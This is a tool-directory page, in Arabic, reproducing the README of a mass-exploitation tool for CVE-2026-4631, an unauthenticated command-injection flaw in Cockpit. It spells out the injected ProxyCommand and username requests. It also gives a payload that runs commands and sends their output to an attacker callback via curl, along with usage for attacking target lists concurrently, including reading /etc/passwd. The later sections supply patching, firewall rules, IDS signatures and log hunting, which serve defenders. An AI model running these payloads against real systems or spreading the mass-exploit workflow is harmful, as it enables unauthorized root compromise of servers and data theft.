Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-4631-cockpit-RCE — تنفيذ التعليمات البرمجية عن بُعد غير مصادق عليه عبر حقن وسيط سطر أوامر SSH Cockpit الإصدارات 327 – 359 | CVSS 9.8 Critical | CWE-78 | Kitploit
أدوات/GitHubGitHub/exdev994/cve-2026-4631-cockpit-rce
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعد
GitHubexdev994/cve-2026-4631-cockpit-rce

CVE-2026-4631-cockpit-RCE

تنفيذ التعليمات البرمجية عن بُعد غير مصادق عليه عبر حقن وسيط سطر أوامر SSH Cockpit الإصدارات 327 – 359 | CVSS 9.8 Critical | CWE-78

عرض المستودع
8منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-4631 — أداة استغلال جماعي لـ Cockpit

تنفيذ أوامر عن بُعد غير مصدق عبر حقن وسيط سطر أوامر SSH إصدارات Cockpit 327 – 359 | CVSS 9.8 حرج | CWE-78

أداة استغلال جماعي لـ CVE-2026-4631 على خدمة الويب Cockpit (cockpit-ws، المنفذ 9090). تدعم وضع فحص الثغرات، وضع RCE مع التقاط مخرجات الأوامر عبر مستمع رد اتصال HTTP مدمج، وضع --auto (فحص واستغلال دفعة واحدة مع الأمر الافتراضي id)، إضافة المنفذ :9090 تلقائيًا للأهداف بدون منفذ، كلا متجهي الهجوم (ProxyCommand + حقن اسم المستخدم %r)، أهداف جماعية من ملف، معالجة متزامنة، ومخرجات نتائج منظمة.

المؤلف: 0xNuts


بداية سريعة

الاستنساخ والتثبيت

root@kitploit:~
git clone https://github.com/ExDev994/CVE-2026-4631-cockpit-RCE.git
cd CVE-2026-4631-cockpit-RCE
pip install -r requirements.txt

إعداد الأهداف

حرر targets.txt — مضيف واحد لكل سطر. سيتم إضافة المنفذ :9090 تلقائيًا إذا لم يكن موجودًا:

root@kitploit:~
192.168.1.10
cockpit.example.com
https://manage.lab.local

التشغيل (وضع AUTO — موصى به)

root@kitploit:~
# فحص + استغلال دفعة واحدة، الأمر الافتراضي "id"
python3 exploit.py -f targets.txt --auto --callback-ip <IP_ATTACKER>

# مثال على الإخراج في results.txt:
# example.com:9090 [ uid=0(root) gid=0(root) groups=0(root) ]

الأوضاع الأخرى

root@kitploit:~
# فحص الثغرات فقط (بدون استغلال)
python3 exploit.py -f targets.txt --scan -o scan_results.txt

# RCE صريح بأمر مخصص
python3 exploit.py -f targets.txt -c "whoami" --callback-ip <IP_ATTACKER>

# هدف واحد
python3 exploit.py -t cockpit.example.com --auto --callback-ip <IP_ATTACKER>

ملاحظات حول رد الاتصال

CVE-2026-4631 هو RCE أعمى — لا تعود مخرجات الأوامر في استجابة HTTP. تستخدم الأداة مستمع HTTP مدمج (المنفذ الافتراضي 8888) لالتقاط المخرجات. تأكد من:

  1. --callback-ip هو عنوان IP يمكن للهدف الوصول إليه (ليس 127.0.0.1)
  2. جدار الحماية يسمح بالاتصال الوارد على منفذ TCP 8888 (أو --listener-port المخصص)
  3. يمكن للهدف إجراء اتصال HTTP صادر إلى عنوان IP المهاجم

طريقة الإصلاح / التخفيف (للمدافع)

1. ترقية Cockpit (إلزامي)

root@kitploit:~
# Debian / Ubuntu
sudo apt update && sudo apt install cockpit-ws

# RHEL / Fedora / CentOS
sudo dnf update cockpit-ws

# التحقق من الإصدار (يجب أن يكون >= 360)
dpkg -l cockpit-ws | awk 'NR==5{print $3}'   # Debian
rpm -q cockpit-ws                            # RHEL

2. تعطيل تسجيل الدخول عن بُعد (حل بديل)

حرر /etc/cockpit/cockpit.conf:

root@kitploit:~
[WebService]
LoginTo = false

أعد تشغيل الخدمة:

root@kitploit:~
sudo systemctl restart cockpit

3. تجزئة الشبكة

اقتصر المنفذ 9090 على شبكة الإدارة فقط:

root@kitploit:~
sudo iptables -A INPUT -p tcp --dport 9090 -s 10.0.0.0/8 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 9090 -j DROP

4. ترقية OpenSSH >= 9.6

يخفف من Vector 1 (حقن ProxyCommand) عبر التحقق المبكر من اسم المضيف:

root@kitploit:~
ssh -V   # يجب أن يكون OpenSSH_9.6 أو أحدث

5. التصحيح اليدوي (النقل العكسي)

إذا لم تتمكن من الترقية إلى 360، طبق التصحيح:

  • cockpit 9d0695647 — أضف فاصل -- في beiboot.py وcockpitauth.c
  • ferny 44ec511c99 — أضف -- في session.py

تفاصيل التصحيح: انظر docs/PATCH_ANALYSIS.md


جدول المحتويات

  1. ملخص الثغرة
  2. متجه الهجوم
  3. متطلبات الاستغلال
  4. التثبيت
  5. الاستخدام
  6. أوضاع التشغيل
  7. أمثلة التنفيذ
  8. تنسيق المخرجات
  9. هندسة الأداة
  10. هيكل الملفات
  11. آلية التقاط RCE الأعمى
  12. الكشف والتخفيف
  13. إخلاء المسؤولية القانوني
  14. المراجع

ملخص الثغرة

الحقلالتفاصيل
CVE IDCVE-2026-4631
GHSAGHSA-m4gv-x78h-3427
الخطورةحرج (CVSS 9.8)
CWECWE-78 — حقن أوامر نظام التشغيل
المتأثرCockpit 327 – 359
تم الإصلاح فيCockpit 360+
المصادقة المطلوبةلا (قبل المصادقة)
المبلغJelle van der Waa
الخدمةcockpit-ws، المنفذ الافتراضي 9090

استبدل Cockpit v327 cockpit-ssh (libssh) بـ python3 -m cockpit.beiboot الذي يستدعي عميل ssh الخاص بـ OpenSSH. يتم تمرير المدخلات التي يتحكم فيها المستخدم — اسم المضيف من مسار URL واسم المستخدم من رأس Authorization: Basic — إلى أداة ssh بدون تعقيم وبدون فاصل -- لنهاية الخيارات. يحدث الحقن قبل التحقق من بيانات الاعتماد، لذلك لا حاجة لتسجيل دخول صالح.


متجه الهجوم

المتجه 1 — حقن ProxyCommand (الرئيسي)

يتم حقن اسم المضيف من مسار URL مع خيار SSH -oProxyCommand=<cmd>.

root@kitploit:~
GET /cockpit+=-oProxyCommand=<URL_ENCODED_PAYLOAD>/login HTTP/1.1
Host: target:9090
Authorization: Basic base64("x:x")

يقوم SSH بتحليل -oProxyCommand=<cmd> كخيار، وينفذ <cmd> كأمر ProxyCommand. يعمل الأمر كعملية مستخدم cockpit-ws.

المتطلبات: OpenSSH < 9.6 على الهدف. OpenSSH 9.6+ لديه تحقق مبكر من اسم المضيف يمنع الأحرف الخاصة.

المتجه 2 — حقن رمز اسم المستخدم %r (الثانوي)

يتم حقن اسم المستخدم من رأس Authorization: Basic مع أمر شل.

root@kitploit:~
GET /cockpit+=legit-host/login HTTP/1.1
Host: target:9090
Authorization: Basic base64("x; <CMD>; #:x")

يقوم SSH بتوسيع %r باسم المستخدم في توجيه Match exec → تنفيذ الأوامر المحقونة في شل.

المتطلبات: يحتوي ملف ssh_config على الهدف على توجيه Match exec مع رمز %r.


متطلبات الاستغلال

جانب المهاجم (الجهاز الذي يشغل الأداة)

  • Python 3.8+
  • عنوان IP يمكن لهدف Cockpit الوصول إليه (لمستمع رد الاتصال)
  • منفذ مفتوح للمستمع (الافتراضي 8888)
  • جدار الحماية يسمح بالاتصال الوارد من الهدف إلى منفذ المستمع

جانب الهدف (مثيل Cockpit)

  • إصدار Cockpit 327 – 359
  • المنفذ 9090 قابل للوصول
  • ميزة تسجيل الدخول عن بُعد (LoginTo) غير معطلة
  • بالنسبة للمتجه 1: OpenSSH < 9.6
  • بالنسبة للمتجه 2: ssh_config مع Match exec %r

التثبيت

root@kitploit:~
# استنساخ من GitHub
git clone https://github.com/ExDev994/CVE-2026-4631-cockpit-RCE.git
cd CVE-2026-4631-cockpit-RCE

# تثبيت التبعيات
pip install -r requirements.txt

# التحقق
python3 exploit.py --help

التبعيات

  • requests>=2.31 — عميل HTTP لطلب الاستغلال
  • colorama>=0.4 — مخرجات طرفية ملونة

لا توجد تبعيات إضافية للمستمع (يستخدم stdlib http.server + threading).


الاستخدام

root@kitploit:~
usage: exploit.py [-h] [-t TARGET] [-f FILE] [--default-port PORT]
                  [-c CMD] [--scan] [--auto] [--vector {auto,proxycommand,username}]
                  [-o OUTPUT] [--callback-ip CALLBACK_IP] [--listener-port LISTENER_PORT]
                  [--threads THREADS] [--timeout TIMEOUT] [--delay DELAY] [--proxy PROXY]
                  [--user-agent UA] [-v] [--no-color]

CVE-2026-4631 Cockpit Mass Exploit — Unauthenticated RCE via SSH Argument Injection

optional arguments:
  -h, --help            show this help message and exit
  -t, --target          single target URL/host (يتم إضافة المنفذ تلقائيًا إذا لم يكن موجودًا)
  -f, --file            file containing list of targets (واحد لكل سطر)
  --default-port        المنفذ الذي يتم إضافته إذا كان الهدف بدون منفذ (الافتراضي: 9090)
  -c, --cmd             الأمر المراد تنفيذه (الافتراضي: "id" في وضع --auto / RCE)
  --scan                وضع فحص الثغرات (بدون RCE، استكشاف نقطة النهاية فقط)
  --auto                فحص + استغلال دفعة واحدة، الأمر الافتراضي "id"
  --vector              متجه الاستغلال: auto|proxycommand|username (الافتراضي: auto)
  -o, --output          ملف مخرجات النتائج (الافتراضي: results.txt)
  --callback-ip         عنوان IP المهاجم الذي يمكن للهدف الوصول إليه (لمستمع رد الاتصال)
  --listener-port       منفذ مستمع رد الاتصال (الافتراضي: 8888)
  --threads             العمال المتزامنون (الافتراضي: 10)
  --timeout             عدد الثواني لانتظار رد الاتصال لكل هدف (الافتراضي: 10)
  --delay               التأخير بين الطلبات بالثواني (الافتراضي: 0)
  --proxy               وكيل HTTP لتصحيح الأخطاء (مثل http://127.0.0.1:8080)
  --user-agent          سلسلة User-Agent مخصصة
  -v, --verbose         مخرجات مفصلة (تصحيح)
  --no-color            تعطيل المخرجات الملونة

أوضاع التشغيل

الوضع 1 — فحص الثغرات (--scan)

استكشاف نقطة النهاية /cockpit+=probe-host/login بدون استغلال. يكشف:

  • بصمة Cockpit من خلال رؤوس/جسم الاستجابة
  • تدفق تسجيل الدخول المعرض للخطر نشط (رمز الاستجابة 401/403/200/500)
  • استنتاج الإصدار إذا أمكن

لا يرسل حمولات ضارة، ولا يحتاج إلى مستمع رد اتصال.

الوضع 2 — RCE مع التقاط الأوامر (-c "cmd")

تنفيذ أمر على الهدف، التقاط المخرجات عبر رد الاتصال:

  • يبدأ مستمع HTTP مدمج في الخلفية
  • يقوم حمولة ProxyCommand بتغليف الأمر مع استخراج curl إلى المستمع
  • يتم ترميز المخرجات base64 وإرسالها POST إلى المستمع
  • يقوم المستمع بفك التشفير ومطابقة الهدف عبر معرف الطلب
  • تُكتب النتيجة إلى ملف المخرجات
  • إذا لم يتم تعيين -c، الأمر الافتراضي = id

الوضع 3 — AUTO (--auto) — موصى به

فحص + استغلال في تمريرة واحدة، الأمر الافتراضي id:

  1. تحليل قائمة الأهداف (إضافة المنفذ 9090 تلقائيًا إذا لم يكن موجودًا)
  2. بدء مستمع رد الاتصال
  3. لكل هدف: فحص ← إذا كان معرضًا، قم باستغلاله مباشرة باستخدام id (أو تجاوز -c)
  4. الأهداف غير المعرضة / التي لا يمكن الوصول إليها يتم تخطيها (لا يتم استغلالها)
  5. النتيجة: host [ uid=0(root) ... ]

الوضع 4 — المتجه التلقائي (--vector auto)

جرب المتجه 1 (ProxyCommand) أولاً. إذا أظهرت الاستجابة أن OpenSSH >= 9.6 (خطأ في التحقق من اسم المضيف)، تراجع إلى المتجه 2 (اسم المستخدم %r).

تسوية المنفذ التلقائي

يتم إضافة المنفذ :9090 تلقائيًا لكل إدخال في targets.txt بدون منفذ:

root@kitploit:~
host              → http://host:9090
host:9090         → http://host:9090
https://host      → https://host:9090
192.168.1.10      → http://192.168.1.10:9090
[::1]             → http://[::1]:9090

أمثلة التنفيذ

AUTO — فحص + استغلال (موصى به)

root@kitploit:~
# هدف بدون منفذ → تلقائي :9090، الأمر الافتراضي "id"
python3 exploit.py -f targets.txt --auto --callback-ip 10.10.10.10

# تجاوز الأمر
python3 exploit.py -f targets.txt --auto -c "whoami" --callback-ip 10.10.10.10

مخرجات results.txt:

root@kitploit:~
# CVE-2026-4631 mass exploit results — 2026-07-12 00:42
# الوضع: auto
# الأمر: id
# المتجه: auto
example.com:9090 [ uid=0(root) gid=0(root) groups=0(root) ]
10.0.0.5:9090 [ uid=0(root) gid=0(root) groups=0(root) ]
host3.example.com:9090 [ VULN - no callback received (OpenSSH >= 9.6?) ]
host4.example.com:9090 [ NOT VULN ]

فحص الثغرات — أهداف جماعية

root@kitploit:~
python3 exploit.py -f targets.txt --scan -o scan_results.txt

مخرجات scan_results.txt:

root@kitploit:~
target1.example.com:9090 [ VULN - Cockpit login flow active (HTTP 401) ]
target2.example.com:9090 [ NOT VULN ]
target3.example.com:9090 [ UNREACHABLE (ConnectionError) ]

RCE — هدف واحد

root@kitploit:~
python3 exploit.py -t target -c "id" --callback-ip 10.10.10.10
# مكافئ: -t http://target:9090/

مخرجات:

root@kitploit:~
target:9090 [ uid=0(root) gid=0(root) groups=0(root) ]

RCE — أهداف جماعية مع التقاط الأوامر

root@kitploit:~
python3 exploit.py -f targets.txt -c "id" -o results.txt --callback-ip 10.10.10.10 --threads 20

RCE — متجه محدد

root@kitploit:~
# فرض المتجه 1 ProxyCommand
python3 exploit.py -f targets.txt -c "cat /etc/passwd" --vector proxycommand

# فرض المتجه 2 اسم المستخدم %r
python3 exploit.py -f targets.txt -c "whoami" --vector username

ضبط التوافقية ووقت الاستجابة

root@kitploit:~
python3 exploit.py -f targets.txt -c "id" \
  --callback-ip 10.10.10.10 \
  --listener-port 9999 \
  --threads 50 \
  --timeout 15 \
  --delay 0.2

تصحيح الأخطاء عبر وكيل

root@kitploit:~
python3 exploit.py -t http://target:9090/ -c "id" --proxy http://127.0.0.1:8080 -v

تنسيق المخرجات

تنسيق ملف النتيجة لكل سطر هدف:

root@kitploit:~
<host> [ <status_or_output> ]
الحالةالمعنى
uid=0(root) ...نجاح RCE، تم التقاط مخرجات الأمر
VULN - no callback received (OpenSSH >= 9.6?)الهدف معرض لكن المتجه 1 محظور بواسطة OpenSSH 9.6+، جرب المتجه 2
VULN - endpoint activeوضع الفحص، تم اكتشاف نقطة نهاية معرضة
NOT VULNCockpit >= 360 أو نقطة النهاية غير موجودة
UNREACHABLEفشل الاتصال / انتهاء مهلة الاتصال
ERROR: <msg>استثناء أثناء التنفيذ

يسجل رأس ملف النتيجة الطابع الزمني، الأمر، المتجه، وعدد الأهداف.


هندسة الأداة

root@kitploit:~
flowchart TD
    CLI["exploit.py<br/>argparse CLI + banner"] --> Parser["core/target.py<br/>تحليل الأهداف وتسويتها"]
    CLI --> Engine["core/engine.py<br/>المنسق"]
    Engine --> Listener["core/listener.py<br/>خادم رد اتصال HTTP في خيط"]
    Engine --> Pool["ThreadPoolExecutor<br/>عمال متزامنون"]
    Pool --> Scanner["core/scanner.py<br/>استكشاف الثغرات"]
    Pool --> Exploit["core/exploit.py<br/>مولد الحمولة"]
    Scanner --> Req1["requests GET<br/>/cockpit+=test/login"]
    Exploit --> Req2["requests GET<br/>/cockpit+=-oProxyCommand=PAYLOAD/login"]
    Req2 --> Target["هدف Cockpit :9090"]
    Target -->|"RCE أعمى<br/>رد اتصال curl"| Listener
    Listener --> Shared["قاموس مشترك<br/>REQID -> مخرجات"]
    Engine --> Result["utils/result.py<br/>كتابة results.txt"]
    Shared --> Engine

المكونات

  • exploit.py — نقطة الدخول، تحليل الوسائط، التوزيع إلى المحرك، عرض اللافتة
  • core/target.py — قراءة ملف -f / عنوان -t، التسوية (إضافة http://، المنفذ الافتراضي 9090)، إزالة التكرار
  • core/scanner.py — وضع --scan، استكشاف نقطة النهاية، بصمة Cockpit، استنتاج الثغرة
  • core/exploit.py — توليد الحمولة لكل متجه، إرسال طلب الاستغلال عبر requests
  • core/listener.py — ThreadingHTTPServer في --callback-ip:--listener-port، تحليل ?id=REQID&out=BASE64، تخزين في قاموس مشترك
  • core/engine.py — المنسق: بدء المستمع، إنشاء ThreadPoolExecutor، مطابقة رد الاتصال بالهدف عبر معرف الطلب، معالجة انتهاء المهلة، كتابة النتيجة
  • utils/banner.py — لافتة ASCII
  • utils/result.py — كاتب ملف النتيجة بتنسيق host [ output ]

هيكل الملفات

root@kitploit:~
CVE-2026-4631-cockpit-RCE/
├── exploit.py                  # نقطة الدخول CLI
├── requirements.txt            # التبعيات
├── README.md                   # هذه الوثائق
├── targets.txt                 # مثال لقائمة الأهداف
├── results.txt                 # المخرجات (مولدة)
├── core/
│   ├── __init__.py
│   ├── target.py               # محلل الأهداف
│   ├── scanner.py              # وضع فحص الثغرات
│   ├── exploit.py              # مولد الحمولة + المرسل
│   ├── listener.py             # خادم رد اتصال HTTP
│   └── engine.py               # المنسق
├── utils/
│   ├── __init__.py
│   ├── banner.py               # لافتة ASCII
│   └── result.py               # كاتب النتائج
└── docs/
    ├── VULN_ANALYSIS.md        # تحليل متعمق للثغرة
    ├── PATCH_ANALYSIS.md       # تحليل تصحيح الالتزام
    └── DETECTION.md            # توقيع الكشف

آلية التقاط RCE الأعمى

CVE-2026-4631 هو RCE أعمى — لا تعود مخرجات الأوامر في استجابة HTTP. تتغلب الأداة على ذلك باستخدام مستمع رد اتصال HTTP مدمج:

التدفق

  1. بدء المستمع — خادم HTTP في خيط يستمع على --callback-ip:--listener-port
  2. توليد REQID — لكل هدف، UUID4 سداسي عشري 8 أحرف فريد
  3. بناء الحمولة — يغلف ProxyCommand الأمر مع استخراج curl:
    root@kitploit:~
    bash -c 'curl -s http://CALLBACK_IP:PORT/cb?id=REQID --data "$(CMD | base64 -w0)"'
    
  4. ترميز الحمولة URL — حقنها في حقل اسم المضيف:
    root@kitploit:~
    GET /cockpit+=-oProxyCommand=<URL_ENC_PAYLOAD>/login
    Authorization: Basic base64("x:x")
    
  5. إرسال الطلب — عبر requests.get، verify=False للشهادات ذاتية التوقيع
  6. انتظار رد الاتصال — استقصاء القاموس المشترك results[REQID] حتى --timeout
  7. المطابقة وفك التشفير — إذا تم استلام رد الاتصال، فك تشفير base64 للمخرجات، المطابقة مع الهدف عبر REQID
  8. كتابة النتيجة — host [ decoded_output ] إلى ملف المخرجات

الاحتياطي بدون رد اتصال

إذا انتهت المهلة دون رد اتصال، تحقق من خطأ SSH في الاستجابة:

  • خطأ في التحقق من اسم المضيف → OpenSSH >= 9.6، المتجه 1 محظور → VULN - no callback (OpenSSH >= 9.6?)
  • خطأ اتصال → UNREACHABLE
  • نقطة النهاية غير موجودة → NOT VULN

التوافقية

  • ThreadPoolExecutor(max_workers=--threads) موازٍ لكل هدف
  • dict[REQID] -> target_host مشترك + dict[REQID] -> output مع threading.Lock
  • ThreadingHTTPServer يعالج ردود الاتصال المتزامنة
  • try/except لكل هدف: خطأ اتصال، خطأ SSL، انتهاء مهلة

الكشف والتخفيف

توقيع IDS للشبكة

root@kitploit:~
GET /cockpit+=-o[A-Za-z]+=.*/login
GET /cockpit+=-[A-Za-z].*/login

راقب:

  • -oProxyCommand= في مسار URL
  • الفاصلة المنقوطة (;) في قيمة Authorization: Basic المفكوكة

صيد السجلات

root@kitploit:~
journalctl -u cockpit-ws | grep -E "beiboot|ProxyCommand|-oProxy"
journalctl _COMM=ssh | grep -v "^--$"

التخفيف

  1. ترقية Cockpit >= 360 (إصلاح إلزامي)
  2. تعطيل تسجيل الدخول عن بُعد — /etc/cockpit/cockpit.conf:
    root@kitploit:~
    [WebService]
    LoginTo = false
    
  3. تجزئة الشبكة — حصر المنفذ 9090 على شبكة الإدارة:
    root@kitploit:~
    iptables -A INPUT -p tcp --dport 9090 -s 10.0.0.0/8 -j ACCEPT
    iptables -A INPUT -p tcp --dport 9090 -j DROP
    
  4. ترقية OpenSSH >= 9.6 — يخفف من المتجه 1 (التحقق المبكر من اسم المضيف)

التحقق من الإصدار

root@kitploit:~
dpkg -l cockpit-ws | awk 'NR==5{print $3}'   # Debian/Ubuntu
rpm -q cockpit-ws                            # RHEL/Fedora
# معرض: 327 <= الإصدار <= 359

إخلاء المسؤولية القانوني

صممت هذه الأداة لـ اختبار الاختراق المصرح به، والبحث الأمني، والتحقق من الثغرات على الأنظمة التي تمتلكها أو لديك إذن كتابي لاختبارها.

استخدام هذه الأداة على أنظمة دون إذن صريح من المالك غير قانوني وقد يعرضك لعقوبات جنائية وفقًا للقوانين المعمول بها (في إندونيسيا: قانون ITE المواد 30-33).

المؤلف غير مسؤول عن سوء استخدام هذه الأداة. استخدمها بأخلاق ومسؤولية.

حالات الاستخدام المصرح بها:

  • تدقيق أمني على البنية التحتية الخاصة بك
  • مشاركات اختبار الاختراق بنطاق مكتوب
  • التحقق من التصحيح في بيئة مختبر
  • CTF والتدريب الأمني

المراجع

المصدرالرابط
إشعار GitHubhttps://github.com/cockpit-project/cockpit/security/advisories/GHSA-m4gv-x78h-3427
إفصاح OSS-Securityhttps://www.openwall.com/lists/oss-security/2026/04/10/5
Red Hat Bugzillahttps://bugzilla.redhat.com/show_bug.cgi?id=2450246
إدخال NVDhttps://nvd.nist.gov/vuln/detail/cve-2026-4631
تصحيح الالتزام (cockpit)https://github.com/cockpit-project/cockpit/commit/9d0695647
تصحيح الالتزام (ferny)https://github.com/allisonkarlitskaya/ferny/commit/44ec511c99
خطأ CPython argparsehttps://github.com/python/cpython/issues/66623
التحقق من اسم المضيف OpenSSH 9.6https://github.com/openssh/openssh-portable/commit/7ef3787
PoC مرجعيhttps://github.com/cyberheartmi9/CVE-2026-4631-cockpit-RCE

الترخيص

لأغراض البحث والاختبار المصرح به. ليس للتوزيع التجاري دون إذن.

تنزيل الأداة